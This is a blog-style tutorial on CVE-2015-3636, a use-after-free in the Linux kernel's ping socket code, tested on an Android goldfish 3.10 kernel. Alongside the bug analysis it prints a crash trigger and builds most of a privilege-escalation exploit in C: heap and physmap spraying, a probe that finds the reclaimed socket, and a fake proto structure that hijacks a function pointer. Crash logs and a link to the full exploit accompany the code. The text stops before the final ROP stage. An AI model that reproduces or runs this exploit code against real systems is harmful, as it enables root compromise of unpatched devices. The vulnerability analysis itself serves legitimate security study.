Let’s play ping-pong in the Linux kernel

Before Anything

CVE-2015-3636, or ping-pong root, is an infamous Use After Free vulnerability disclosed by the Keen team. Because of its influence and the damage it could have done to every Linux-kernel-based device, Android phones for example, it won the Pwnie Award for Best Privilege Escalation Bug in 2015 [1].

Cool enough, but 2015 is a long time ago. To analyze this amazing vulnerability, I chose the Android goldfish Linux 3.10.0 kernel as the research target. You can browse the source code through this link [2].

In the following, I will introduce the details of this bug and trigger it to crash the Linux kernel. Last but not least, I will write an exploit from scratch together with you (and tell the stories of my failures along the way, for sure).

Pre-knowledge

Before introducing the bug, I think it is worth covering some interesting background on Linux networking internals.

When you want to create a network socket, the system call is described below:

#include <sys/types.h>          /* See NOTES */
#include <sys/socket.h>

int socket(int domain, int type, int protocol);

The domain argument specifies a communication domain; for the IPv4 Internet protocol family we are interested in, that is the AF_INET macro. The type argument is chosen from SOCK_STREAM, SOCK_DGRAM, SOCK_RAW and so on, representing a byte-stream connection, a datagram connection, raw network access, and so forth. The choice of domain restricts the valid choices of type and protocol. For instance, with AF_INET as the first argument, the protocol argument is picked from IPPROTO_TCP, IPPROTO_UDP, IPPROTO_ICMP and IPPROTO_IP, and each protocol only pairs with a matching type (IPPROTO_TCP goes with SOCK_STREAM, for example).

int fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

So how does the kernel handle this system call? The SyS_socket() entry point calls sock_create(), which in turn calls __sock_create(). In __sock_create(), the kernel chooses the protocol family handler based on the argument and calls the corresponding create function, as below.

	pf = rcu_dereference(net_families[family]);
	/* ... */
	err = pf->create(net, sock, protocol, kern);

For the AF_INET protocol family, inet_create() then takes over and goes further by picking the specific protocol, tcp_prot in this case.

There are a couple of pretty juicy lines inside inet_create().

    /* Add to protocol hash chains. */
    sk->sk_prot->hash(sk);

What are the protocol hash chains? To the best of my knowledge, the struct sock is inserted into a hash table to speed up finding the right socket when related packets arrive. Hashing stands for speed and optimization, and a socket that is hashed must also be unhashed when it is destroyed (each proto struct has its own unhash function pointer).

However, optimization sometimes brings danger. :(

The Bug itself

The real amazing bug in the wild internal just make me feel like an idiot. –my captain of the CTF team

The erroneous code is in the function ping_unhash() in net/ipv4/ping.c.

void ping_unhash(struct sock *sk)
{
	struct inet_sock *isk = inet_sk(sk);
	pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num);
	if (sk_hashed(sk)) {
		write_lock_bh(&ping_table.lock);
		hlist_nulls_del(&sk->sk_nulls_node);
		sock_put(sk);
		isk->inet_num = 0;
		isk->inet_sport = 0;
		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
		write_unlock_bh(&ping_table.lock);
	}
}

Of course, we cannot tell what exactly happens from this heavily function-oriented code, so let me show you more details.

// include/net/sock.h
static inline bool sk_unhashed(const struct sock *sk)
{
	return hlist_unhashed(&sk->sk_node);
}

static inline bool sk_hashed(const struct sock *sk)
{
	return !sk_unhashed(sk);
}

/* ...some far place in include/linux/list.h... */

static inline int hlist_unhashed(const struct hlist_node *h)
{
	return !h->pprev;
}

And this one.

// include/linux/list_nulls.h
static inline void hlist_nulls_del(struct hlist_nulls_node *n)
{
	__hlist_nulls_del(n);
	n->pprev = LIST_POISON2;
}

The last and spicy one.

// include/net/sock.h
struct sock {
    struct sock_common __sk_common;
#define sk_node         __sk_common.skc_node
#define sk_nulls_node   __sk_common.skc_nulls_node
/* ...... */
};

// include/net/sock.h
struct sock_common {
/* ... */
	union {
		struct hlist_node	skc_node;
		struct hlist_nulls_node skc_nulls_node;
	};
/* ... */  
};

Okay then, having read the code snippets above, can you find the interesting bug here?

–A split line–

Whether you found it or not, I will talk about it. When ping_unhash() is called, it checks whether this sock has been hashed before, using the sk_hashed() helper. Internally, that helper only checks whether the pprev of the node is NULL (a NULL pprev means the node is not on any hash list). If pprev is not NULL, ping_unhash() enters the following block and does the unhash job, deleting the node from the hash list by calling hlist_nulls_del().

That sounds pretty legitimate. However, after hlist_nulls_del() removes the node, it assigns LIST_POISON2 to the node’s pprev instead of NULL. Because sk_node and sk_nulls_node share a union, sk_hashed() reads that same pprev, so the next time ping_unhash() is called the sock still looks hashed and the unhash job runs again.

And that is not what we expect, not at all.
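To make the mismatch between the "hashed" check and the delete helper concrete, here is a minimal userspace sketch. It is only a model: the struct and every model_* name are made up for illustration, the real unlinking is left out, and model_del_init() is a hypothetical safe variant rather than actual kernel code.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Userspace model only: a stripped-down node with the one field that matters. */
struct model_node {
	struct model_node **pprev;
};

/* Same numeric value as the faulting address in the crash log (never dereferenced here). */
#define MODEL_POISON2 ((struct model_node **)(uintptr_t)0x00200200)

/* Mirrors hlist_unhashed(): a node counts as hashed while pprev is not NULL. */
bool model_hashed(const struct model_node *n)
{
	return n->pprev != NULL;
}

/* Mirrors hlist_nulls_del(): unlink (omitted), then poison pprev. */
void model_del_poison(struct model_node *n)
{
	n->pprev = MODEL_POISON2;
}

/* Hypothetical safe variant: reset pprev so the hashed check fails next time. */
void model_del_init(struct model_node *n)
{
	n->pprev = NULL;
}

/* Counts how many times an unhash guarded by model_hashed() actually runs. */
int model_unhash_runs(void (*del)(struct model_node *), int calls)
{
	struct model_node *head = NULL;
	struct model_node n = { .pprev = &head };	/* pretend the node is hashed */
	int runs = 0;

	assert(calls >= 0);
	for (int i = 0; i < calls; i++) {
		if (model_hashed(&n)) {
			del(&n);
			runs++;
		}
	}
	return runs;
}
```

Calling model_unhash_runs(model_del_poison, 2) runs the unhash body twice, while the variant that resets pprev to NULL runs it only once.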

Triggering

Now we aim to trigger this unexpected double unhashing. To save your time, I will directly (shamelessly) use the open-source trigger code and analyze it afterward.

// trigger.c
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(int argc, char* argv[])
{
	int sock, ret;
	struct sockaddr_in sa;

	sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);

	/* first connect: hashes the ping socket */
	memset(&sa, 0, sizeof(sa));
	sa.sin_family = AF_INET;
	ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));

	/* AF_UNSPEC connects: each one reaches ping_unhash() */
	sa.sin_family = AF_UNSPEC;
	ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
	ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
	return 0;
}

After you compile this code and run it on the vulnerable machine (emulated by QEMU), it reliably crashes the kernel as below.

$ (before you need to adb push the binary and adb shell to that emulator)
$ ./trigger
Unable to handle kernel paging request at virtual address 00200200
pgd = ffffffc03db3b000
[00200200] *pgd=000000007db3e003, *pmd=0000000000000000
Internal error: Oops: 94000046 [#1] SMP
Modules linked in:
CPU: 0 PID: 898 Comm: poc Not tainted 3.10.0+ #1
task: ffffffc03eddd100 ti: ffffffc03db44000 task.ti: ffffffc03db44000
PC is at ping_unhash+0x30/0xa4
LR is at ping_unhash+0x28/0xa4
pc : [<ffffffc0003c4d8c>] lr : [<ffffffc0003c4d84>] pstate: 80000145
sp : ffffffc03db47da0
x29: ffffffc03db47da0 x28: ffffffc03db44000
x27: ffffffc0005dc000 x26: 00000000000000cb
x25: 0000000000000116 x24: 0000000000000015
x23: 0000000000000000 x22: 0000007fef136f6c
x21: 0000000000000010 x20: ffffffc00045a000
x19: ffffffc03db32300 x18: 0000007faa0ce000
x17: 0000007fef1366b0 x16: ffffffc000346e8c
x15: 000000000047c927 x14: 000000000047c903
x13: 0000000000000000 x12: 000000000047c8df
x11: 00000000ffffffff x10: 00000000ffffffff
x9 : 0000000000000000 x8 : 00000000000000cb
x7 : 7f7f7f7f7f7f7f7f x6 : 0000000000000000
x5 : 0000000000000001 x4 : ffffffc0003bb928
x3 : 0000000000000002 x2 : 0000000000000000
x1 : 0000000000200200 x0 : 0000000000000003
......
Call trace:
[<ffffffc0003c4d8c>] ping_unhash+0x30/0xa4
[<ffffffc0003af350>] udp_disconnect+0x84/0xe4
[<ffffffc0003bb9d8>] inet_dgram_connect+0xb0/0xdc
[<ffffffc000346f04>] SyS_connect+0x78/0xcc
Code: 91080000 940247d4 f9401e61 f9401a60 (f9000020)
---[ end trace 937e3c3edcc9779b ]---
Kernel panic - not syncing: Fatal exception in interrupt

In addition, if you get an error like Permission denied when creating the socket, you have to fix the permission issue. I just use the command sysctl -w net.ipv4.ping_group_range="0 2147483647" to allow ICMP socket creation through the system call.

Well done, let’s analyze how the trigger works.

It first creates an AF_INET socket with the SOCK_DGRAM and IPPROTO_ICMP arguments. That is sensible as we are going to hack the ping protocol, which is part of ICMP. As for why SOCK_DGRAM is picked, let’s go further.

The code then calls connect(sock, (const struct sockaddr *) &sa, sizeof(sa));, using AF_INET as sa.sin_family. Let’s dig deeper to see what happens.

The entry point of the connect system call is SyS_connect, defined in net/socket.c as below.

SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
		int, addrlen)
{
	struct socket *sock;
	struct sockaddr_storage address;
	int err, fput_needed;

	sock = sockfd_lookup_light(fd, &err, &fput_needed);
	if (!sock)
		goto out;
	err = move_addr_to_kernel(uservaddr, addrlen, &address);
	if (err < 0)
		goto out_put;

	err =
	    security_socket_connect(sock, (struct sockaddr *)&address, addrlen);
	if (err)
		goto out_put;

	err = sock->ops->connect(sock, (struct sockaddr *)&address, addrlen,
				 sock->file->f_flags);
out_put:
	fput_light(sock->file, fput_needed);
out:
	return err;
}

It fetches the actual socket struct from the user-supplied fd, copies the address into kernel space, performs the security check, and then calls the socket-specific connect operation. In this case, it jumps to inet_dgram_connect(), because the socket was created with SOCK_DGRAM and therefore uses the inet_dgram_ops operation struct.

int inet_dgram_connect(struct socket *sock, struct sockaddr *uaddr,
		       int addr_len, int flags)
{
	struct sock *sk = sock->sk;

	if (addr_len < sizeof(uaddr->sa_family))
		return -EINVAL;
	if (uaddr->sa_family == AF_UNSPEC)
		return sk->sk_prot->disconnect(sk, flags);

	if (!inet_sk(sk)->inet_num && inet_autobind(sk))
		return -EAGAIN;
	return sk->sk_prot->connect(sk, uaddr, addr_len);
}

As this connect is called with the AF_INET family, it passes the first two checks and enters inet_autobind(). That function in turn calls the socket-specific get_port method.

static int inet_autobind(struct sock *sk)
{
/* ... */
		if (sk->sk_prot->get_port(sk, 0)) {
			release_sock(sk);
			return -EAGAIN;
		}
/* ... */

In this case, that results in a call to ping_get_port(). There, the kernel inserts the socket into its ping_hashslot hash chain to speed up later lookups. (What is weird is that ping_hash is just an empty function…)

int ping_get_port(struct sock *sk, unsigned short ident)
{
/* ... */
	if (sk_unhashed(sk)) {
		pr_debug("was not hashed\n");
		sock_hold(sk);
		hlist_nulls_add_head(&sk->sk_nulls_node, hlist);
		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
	}
/* ... */	
}

Look familiar? This is symmetrical to the ping_unhash function. In fact, this is how a ping socket gets hashed, and that is the purpose of the first connect system call.

So what about the other two connect calls? They are designed to call into ping_unhash() twice. See the code snippet of inet_dgram_connect() above: when the AF_UNSPEC value is supplied, the connect is abandoned and falls into the disconnect method, which is udp_disconnect() here. In that function, if the socket has not been bound to a specific port, it calls the unhash method, which is our vulnerable target, ping_unhash.

That is, we can go into ping_unhash twice and trigger the bug. But wait a moment, what about the crash?

BUG: unable to handle kernel paging request at 00200200

Disassembling vmlinux and locating the precise position, we find that the BUG happens here.

// static inline void __hlist_nulls_del(struct hlist_nulls_node *n)
	*pprev = next;

That is because n->pprev was already changed to LIST_POISON2 (0x00200200 here) by the first connect with AF_UNSPEC. This time, dereferencing pprev hits an unmapped address and causes the kernel panic.

Exploiting

We now have a pointer dereference at a user-space address, which by itself is rather limited for constructing a useful primitive. To keep the kernel from crashing here and to reach another vulnerable point, the attacker can call mmap to map this address. Thankfully, once hlist_nulls_del() finishes, the following sock_put() can be used to produce a Use After Free of the sock object.

/* Ungrab socket and destroy it, if it was the last reference. */
static inline void sock_put(struct sock *sk)
{
	if (atomic_dec_and_test(&sk->sk_refcnt)) // <- dec twice and free
		sk_free(sk);
}

No RCU, no strict checking, what a strong and stable Use After Free trigger…
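The reference counting behind this can be replayed in a tiny userspace model. This is only a sketch under assumptions: the struct and all model_* names are invented for illustration, the starting count of 1 stands for the reference held on behalf of the open socket, and the poison address is assumed to be mapped so that the second unhash gets as far as sock_put().

```c
#include <assert.h>
#include <stdbool.h>

/* Userspace model only: tracks the reference count and whether "free" ran. */
struct model_sock {
	int refcnt;
	bool freed;
	bool hashed;	/* buggy check: stays true after the first unhash */
};

/* Stands in for sock_put(): drop one reference, free on the last one. */
void model_sock_put(struct model_sock *sk)
{
	assert(sk->refcnt > 0);
	if (--sk->refcnt == 0)
		sk->freed = true;	/* stands in for sk_free() */
}

/* connect(AF_INET): ping_get_port() takes a reference when hashing. */
void model_connect_inet(struct model_sock *sk)
{
	if (!sk->hashed) {
		sk->refcnt++;	/* sock_hold() */
		sk->hashed = true;
	}
}

/* connect(AF_UNSPEC): ping_unhash() drops a reference, but because of the
 * poison value the socket still looks hashed afterwards. */
void model_connect_unspec(struct model_sock *sk)
{
	if (sk->hashed)
		model_sock_put(sk);
}

/* Replays the trigger sequence and reports whether the object got freed
 * while the file descriptor (not modelled) would still point at it. */
bool model_trigger_frees_socket(void)
{
	struct model_sock sk = { .refcnt = 1, .freed = false, .hashed = false };

	model_connect_inet(&sk);	/* refcnt 1 -> 2 */
	model_connect_unspec(&sk);	/* refcnt 2 -> 1 */
	model_connect_unspec(&sk);	/* refcnt 1 -> 0, freed */
	return sk.freed;
}
```

In this model the second AF_UNSPEC connect drops the last reference, so the object is released although the descriptor is still open.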

With the Use After Free in hand, the next step is to turn it into something we can control.

Allocating and Releasing

To do that, we first find the place where the sock is allocated. When the socket system call is used, inet_create() calls sk_alloc(), defined in net/core/sock.c, which in turn allocates the object through sk_prot_alloc().

static struct sock *sk_prot_alloc(struct proto *prot, gfp_t priority,
		int family)
{
	struct sock *sk;
	struct kmem_cache *slab;

	slab = prot->slab;
	if (slab != NULL) {
		sk = kmem_cache_alloc(slab, priority & ~__GFP_ZERO);
		if (!sk)
			return sk;
		if (priority & __GFP_ZERO) {
			if (prot->clear_sk)
				prot->clear_sk(sk, prot->obj_size);
			else
				sk_prot_clear_nulls(sk, prot->obj_size);
		}
	} else
		sk = kmalloc(prot->obj_size, priority);
/* ... */

In this function, the sock is allocated by kmem_cache_alloc if the slab member is not NULL; otherwise kmalloc is used.

In our case, the core inet_init() function calls proto_register() with ping_prot as the argument and alloc_slab set to true. Thus, a kmem_cache object is created with PING as its name.

prot->slab = kmem_cache_create(prot->name, prot->obj_size, 0,
		SLAB_HWCACHE_ALIGN | prot->slab_flags,
		NULL);
// Through debugging, the prot->name = "PING", prot->objsize = 0x270, 
// align = 0, flags = 0x2000 (should be just SLAB_HWCACHE_ALIGN)
// In addition, per PING slub will have 2 pages and max 16 objects

Symmetrically, the corresponding release of the object is done in the sk_prot_free() function.

static void sk_prot_free(struct proto *prot, struct sock *sk)
{
	struct kmem_cache *slab;
	struct module *owner;

	owner = prot->owner;
	slab = prot->slab;

	security_sk_free(sk);
	if (slab != NULL)
		kmem_cache_free(slab, sk);
	else
		kfree(sk);
	module_put(owner);
}

UAF primitive

By now, we understand how the object is allocated and released. After successfully triggering ping_unhash() twice, and with it the sock_put() that frees a sock still referenced by an open socket file descriptor, obtaining a malicious primitive is our next target. Looking at the content of struct sock, there are a lot of pointers to hunt.

A direct idea for exploiting is to point the skc_prot element in __sk_common at a fake, user-controlled object, and then point the close method of that structure at the backdoor function. Thus, when the user closes this socket, the malicious code is executed.

In order to do that, a clever spraying solution is needed. Traditionally, reclaiming an already freed object can be achieved with add_key, sendmsg, and setxattr. However, the ping sock object is allocated from the dedicated PING kmem_cache, which is a strong limitation.

For example, you can create another PING socket to reclaim the freed ping sock object, but you cannot fill it with what you want, because the content of that sock is written by the kernel’s initialization code.

To overcome the constraint, the author tried another crazy idea: physmap spraying. That is a basic building block of the attack method named ret2dir, proposed at USENIX Security 2014. Although it sounds like a complicated and intricate hacking skill, its core is super naive. The attacker creates thousands of ping sock objects, filling the PING kmem_cache with excess slab pages, then selectively releases part of them so that whole slab pages are returned to the page allocator. Once a slab page containing a vulnerable sock is returned, it may be handed out again to serve a userspace page fault. I won’t explain the details here; you may refer to this blog of mine if interested.

P.S. To be honest, even though my tiny experiment with mmap and the slub allocator was done in an x86 environment, I failed in this case (the reason will be given later). So to ease my burden, I will pick the environment from an existing CTF problem (ensuring that I already have a valid answer ;D). The target kernel is labeled version 3.10+, which shouldn’t make much difference for our exploit. If you are interested, try to implement this on another architecture. Last but not least, you can refer to this GitHub repo [3] if you want a quick test.

Fetch the ‘double-freed’ socket

The first step of our plan is to use socket spraying together with physmap spraying to build a UAF primitive. “Talk is cheap, show me the code.” So let’s convert the idea into exploit code.

int main(int argc, char* argv[])
{
	prepare(...);	
	// We can do some preparation here, maximize the resources for example

	protection(...);	
	// Then we should do `mmap` of the poison value to avoid early crash

	spraying(...);
	// We should create vulnerable sockets as well as spraying lots of ping sock objects here

	fetching(...);
	// Then we can do lots of mmap here, trying to fetch the target page

	close(...the fetch socket...);
}

The above is just a bare-bones outline; let’s implement it step by step. Before launching the attack, some preparation has to be done.

void prepare(void)
{
	printf("[+] Start prepare...\n");
	/* maximize the fd limit to enable spraying */
	struct rlimit rlim;
	int ret;

	ret = getrlimit(RLIMIT_NOFILE, &rlim);
	if (ret != 0) errhandler("[!] prepare().getrlimit-1");

	rlim.rlim_cur = rlim.rlim_max;
	setrlimit(RLIMIT_NOFILE, &rlim);

	ret = getrlimit(RLIMIT_NOFILE, &rlim);
	if (ret != 0) errhandler("[!] prepare().getrlimit-2");

	printf("[~] Done prepare!\n");
}

Here we just use the setrlimit system call to maximize the number of sockets we can ask for. This is essential for the later heap spraying, as we have to create enough sockets to make sure the sock memory can end up overlapping with the pages we map from user space (the physmap spray).

Then we add a simple protection in case our exploit crashes the kernel at an early stage.

void protection(void)
{
	printf("[+] Start protection...\n");
	int i;
	void* protect = mmap(PROTECT_BASE, MAX_NULLMAP_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
	if(MAP_FAILED == protect) errhandler("[!] protection().mmap");

	for(i = 0; i < MAX_NULLMAP_SIZE / PAGE_SIZE; i++)
		memset((char *)protect + PAGE_SIZE * i, 0x90, PAGE_SIZE);
	printf("[~] Done protection!\n");
}

The PROTECT_BASE in our experiments should be 0x200000, as the invalid memory dereference is at 0x200200. After we mmap that address range, the page fault is no longer triggered (assuming no SMAP-like protection that blocks kernel access to user pages).
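The relation between the faulting address and the mapping base is plain page arithmetic. The helpers below are a small sketch of it; the function names are made up for illustration, and the 4096-byte page size and 8-byte write width used in the example are assumptions about the target.

```c
#include <assert.h>
#include <stdint.h>

/* Round an address down to the start of its page.
 * page_size must be a power of two. */
uint64_t page_base(uint64_t addr, uint64_t page_size)
{
	assert(page_size != 0 && (page_size & (page_size - 1)) == 0);
	return addr & ~(page_size - 1);
}

/* Non-zero when a write of `width` bytes at `addr` stays inside the
 * mapping [base, base + len). */
int mapping_covers(uint64_t base, uint64_t len, uint64_t addr, uint64_t width)
{
	return addr >= base && width <= len && addr - base <= len - width;
}
```

For example, page_base(0x200200, 4096) gives 0x200000, and a one-page mapping at that base covers the 8-byte store at 0x200200.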

So far so good, let’s spray those vulnerable sockets now.

void spraying(void)
{
	printf("[+] Start socket spraying...\n");
	int i, ret;
	struct sockaddr _sockaddr1 = { .sa_family = AF_INET   };
	struct sockaddr _sockaddr2 = { .sa_family = AF_UNSPEC };

	for(i = 0; i < MAX_VULTRIG_SOCKS_COUNT; i++)
	{
		vultrig_socks[i] = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
		if(vultrig_socks[i] < 0) errhandler("[!] spraying().socket-create vultrig sockets");

		ret = connect(vultrig_socks[i], &_sockaddr1, sizeof(_sockaddr1));
		if(ret < 0) errhandler("[!] spraying().connect-hashing the socket");
	}

	for(i = 0; i < MAX_VULTRIG_SOCKS_COUNT; i++)
	{
		ret = connect(vultrig_socks[i], &_sockaddr2, sizeof(_sockaddr2));
		if(ret < 0) errhandler("[!] spraying().connect-free once");

		ret = connect(vultrig_socks[i], &_sockaddr2, sizeof(_sockaddr2));
		if(ret < 0) errhandler("[!] spraying().connect-free twice");
	}

	printf("[~] Done socket spraying!\n");

	printf("[+] Start physmap spraying...\n");
	memset(physmap_spray_pages,    0, sizeof(physmap_spray_pages));
	memset(physmap_spray_children, 0, sizeof(physmap_spray_children));
	physmap_spray_pages_count = 0;
	for(i = 0; i < MAX_PHYSMAP_SPRAY_PROCESS; i++)
	{
		int j;
		void* mapped;
		void* mapped_page;
		mapped = mmap(NULL, MAX_PHYSMAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
		if (mapped == MAP_FAILED) errhandler("[!] spraying().mmap");
		for(j = 0; j < MAX_PHYSMAP_SIZE / PAGE_SIZE; j++)
		{
			memset((void *)((char *)mapped + PAGE_SIZE * j), 0x41, PAGE_SIZE);
			mapped_page = (void *)((char *)mapped + PAGE_SIZE * j);
			*(unsigned long *)((char *)mapped_page + 0x1D8) = MAGIC_VALUE + physmap_spray_pages_count;
			// special magic for quick identify
			physmap_spray_pages[physmap_spray_pages_count] = mapped_page;
			physmap_spray_pages_count++;
		}
	}
	}
	printf("[~] Done physmap spraying!\n");
}

Tuning the spraying parameters is fiddly, so I just copied them from the working exploit, and fortunately they work. In this function, we create MAX_VULTRIG_SOCKS_COUNT sockets and do what we did in the PoC code (hash each socket, then release it through the double unhash). After that, we have plenty of released struct sock objects in hand.

Then we start physmap spraying, hoping that one of the pages in our large mmap regions reuses the memory of a released sock. To test that, we can use the ioctl + SIOCGSTAMPNS trick, which reads back a specific field of the socket struct as a timestamp. That is to say, if we fill that field (at offset 0x1D8 in this build) with an identifiable magic value, we can use this ioctl to verify whether a given socket now lives in one of our pages. The code is shown below.

void fetching(void)
{
	printf("[+] Start fetching the UAF socket...\n");
    struct timespec time;
    uint64_t value;
    void* page = NULL;
    int j = 0;
    int got = 0;
	int index = MAX_VULTRIG_SOCKS_COUNT / 2;
    do
    {
        exp_sock = vultrig_socks[index];
        memset(&time, 0, sizeof(time));
        ioctl(exp_sock, SIOCGSTAMPNS, &time);

        value = ((uint64_t)time.tv_sec * NSEC_PER_SEC) + time.tv_nsec;
        for(j = 0;  j < physmap_spray_pages_count; j++)
        {
            page = physmap_spray_pages[j];
            if(value == *(unsigned long *)((char *)page + 0x1D8)) 	// value equals to what we filled
            {
                printf("[*] obtained magic:0x%llx\n", (unsigned long long)value);
                got      = 1;
                payload = page;	// The vulnerable socket is located in this page
                break;
            }
        }
        index += 1;
    }
    while(!got && index < MAX_VULTRIG_SOCKS_COUNT);

    if(got == 0) errhandler("[!] fetching() fail...");

	printf("[~] Done fetching the UAF socket!\n");
}
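The line that recombines tv_sec and tv_nsec in fetching() works because the ioctl hands back the 64-bit field split into seconds and nanoseconds. Here is a simplified userspace model of that round trip; the model_* names are hypothetical, and the kernel’s real conversion has more corner cases than this sketch covers (only non-negative values are handled).

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_NSEC_PER_SEC 1000000000LL

struct model_timespec {
	int64_t tv_sec;
	int64_t tv_nsec;
};

/* Model of how a non-negative 64-bit nanosecond stamp is split up
 * before it is handed to user space. */
struct model_timespec model_ns_to_timespec(int64_t ns)
{
	struct model_timespec ts;

	assert(ns >= 0);
	ts.tv_sec = ns / MODEL_NSEC_PER_SEC;
	ts.tv_nsec = ns % MODEL_NSEC_PER_SEC;
	return ts;
}

/* What fetching() does with the ioctl result: rebuild the raw value. */
uint64_t model_timespec_to_value(struct model_timespec ts)
{
	return (uint64_t)ts.tv_sec * MODEL_NSEC_PER_SEC + (uint64_t)ts.tv_nsec;
}
```

With the magic from the run below, 0x4b625e33 splits into tv_sec = 1 and tv_nsec = 264737843, and recombining the two gives back 0x4b625e33.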

Now we can check whether the UAF succeeded. (The entire code can be downloaded here: https://gist.github.com/f0rm2l1n/31ab1d42e0e18f94a5ce928816a5f65c)

# user screen
$ # also need adb push the code 
$ ./exp1
[+] Start prepare...
[~] Done prepare!
[+] Start protection...
[~] Done protection!
[+] Start socket spraying...
[~] Done socket spraying!
[+] Start physmap spraying...
[~] Done physmap spraying!
[+] Start fetching the UAF socket...
[*] obtained magic:0x4b625e33
[~] Done fetching the UAF socket!


# kernel dmesg
.......
IPv4: Attempt to release alive inet socket ffffffc032400000
IPv4: Attempt to release alive inet socket ffffffc032400300
IPv4: Attempt to release alive inet socket ffffffc032400600
IPv4: Attempt to release alive inet socket ffffffc032400900
IPv4: Attempt to release alive inet socket ffffffc032400c00
IPv4: Attempt to release alive inet socket ffffffc032400f00
IPv4: Attempt to release alive inet socket ffffffc032401200
IPv4: Attempt to release alive inet socket ffffffc032401500
IPv4: Attempt to release alive inet socket ffffffc032401800
IPv4: Attempt to release alive inet socket ffffffc032401b00
IPv4: Attempt to release alive inet socket ffffffc032402000
IPv4: Attempt to release alive inet socket ffffffc032402300
IPv4: Attempt to release alive inet socket ffffffc032402600
IPv4: Attempt to release alive inet socket ffffffc032402900
IPv4: Attempt to release alive inet socket ffffffc032402c00
IPv4: Attempt to release alive inet socket ffffffc032402f00
IPv4: Attempt to release alive inet socket ffffffc032403200
IPv4: Attempt to release alive inet socket ffffffc032403500
IPv4: Attempt to release alive inet socket ffffffc032403800
IPv4: Attempt to release alive inet socket ffffffc032403b00
IPv4: Attempt to release alive inet socket ffffffc032404000
Unable to handle kernel paging request at virtual address 4141414141414141
pgd = ffffffc03dbcb000
[4141414141414141] *pgd=0000000000000000
Internal error: Oops: 94000005 [#1] SMP
Modules linked in:
CPU: 0 PID: 945 Comm: exp1 Not tainted 3.10.0+ #1
task: ffffffc03ed32d00 ti: ffffffc03dbd4000 task.ti: ffffffc03dbd4000
PC is at ip_mc_drop_socket+0x34/0xa8
LR is at ip_mc_drop_socket+0x24/0xa8
pc : [<ffffffc0003bdc0c>] lr : [<ffffffc0003bdbfc>] pstate: 60000145
sp : ffffffc03dbd7d90
x29: ffffffc03dbd7d90 x28: ffffffc03dbd4000
x27: ffffffc0005dc000 x26: 0000000000000039
x25: ffffffc03daf7710 x24: ffffffc030c31430
x23: ffffffc00045a000 x22: ffffffc031620000
x21: ffffffc03ebf8180 x20: ffffffc0316200e8
x19: 4141414141414141 x18: 0000007f94698000
x17: 0000000000000000 x16: ffffffc000141878
x15: 00000000004a7d04 x14: 0000000000000010
x13: 0a2174656b636f73 x12: 2046415520656874
x11: 0000000000000000 x10: 0000007f93817108
x9 : 6d313e33a48870ce x8 : 0000000000000039
x7 : ffffffc000617038 x6 : 0000000000000000
x5 : 0000000000000000 x4 : 0000000000000000
x3 : 0000000041414141 x2 : 0000000000000000
x1 : 0000000000000000 x0 : ffffffc03ed32d00
...
Call trace:
[<ffffffc0003bdc0c>] ip_mc_drop_socket+0x34/0xa8
[<ffffffc0003b9fd0>] inet_release+0x48/0x94
[<ffffffc000344d58>] sock_release+0x20/0x9c
[<ffffffc000344de0>] sock_close+0xc/0x1c
[<ffffffc0001439bc>] __fput+0x98/0x23c
[<ffffffc000143c20>] ____fput+0x8/0x14
[<ffffffc0000b5048>] task_work_run+0x94/0xec
[<ffffffc000088070>] do_notify_resume+0x50/0x64
Code: 9103a2d4 b00004f7 f94146d3 b4000313 (f9400260)

The fact is that the UAF is not one hundred percent stable, so run it again if the result does not match the expectation.

Cool! The kernel crashed because of a page fault at 0x4141414141414141, which is obviously the value we filled in during our mmap spraying.

	memset((void *)((char *)mapped + PAGE_SIZE * j), 0x41, PAGE_SIZE); 

We can look into the source code to understand this panic. It happens in the function void ip_mc_drop_socket(struct sock *sk), which is called by inet_release().

void ip_mc_drop_socket(struct sock *sk)
{
	struct inet_sock *inet = inet_sk(sk);
	struct ip_mc_socklist *iml;
	struct net *net = sock_net(sk);

	if (inet->mc_list == NULL)
		return;
	/* .... */
}

This function first obtains the variable inet from the sock, which is now filled with 0x41 bytes. It then reads the mc_list field of inet, gets 0x4141414141414141 instead of NULL, and goes on to dereference it, which results in the invalid access. To avoid that, we can place NULL in this field.

PC hijacking

As we already have a controllable UAF primitive, it’s time to look for a useful code or data pointer for further exploitation. As discussed earlier, hijacking the skc_prot field of __sk_common in the struct sock is a workable way, as inet_release() makes an indirect call through it.

int inet_release(struct socket *sock)
{
	struct sock *sk = sock->sk;

	if (sk) {
		/* ... */
		sk->sk_prot->close(sk, timeout);	// very juicy
	}
	return 0;
}

You can refer to here for the details of proto. The related code looks like this.

	/* offset 40 is where the sk_prot pointer sits in this build */
	struct proto* fakeproto = malloc(sizeof(struct proto));
	fakeproto->close = /* what we want to go */;
	*(unsigned long *)((char* )payload + 40)  = (unsigned long)fakeproto;

Privilege Escalation

So what we should do next seems quite clear: can we write a user-mode backdoor and directly call commit_creds() as usual? Unfortunately, the answer is no, and it really hit me after testing. The kernel shows an error message like below.

Bad mode in Synchronous Abort handler detected, code 0x8400000f
CPU: 0 PID: 914 Comm: exp2 Not tainted 3.10.0+ #1
task: ffffffc03ecd5100 ti: ffffffc03db60000 task.ti: ffffffc03db60000
PC is at 0x400c30
LR is at inet_release+0x84/0x94

Well? What happened? After googling around, I found that the ARM architecture has a security property inside its page tables, PXN (Privileged eXecute Never). You can look up the manual or this description for details. In a nutshell, the ARM architecture keeps fine-grained access permissions for different memory locations, separating EL0 (unprivileged) from the privileged modes. Thus, jumping directly to malicious user-space code from the kernel does not work here.

Fine, time to learn and try something new. As we cannot execute the code we wrote, we can adopt the kernel ROP technique instead.

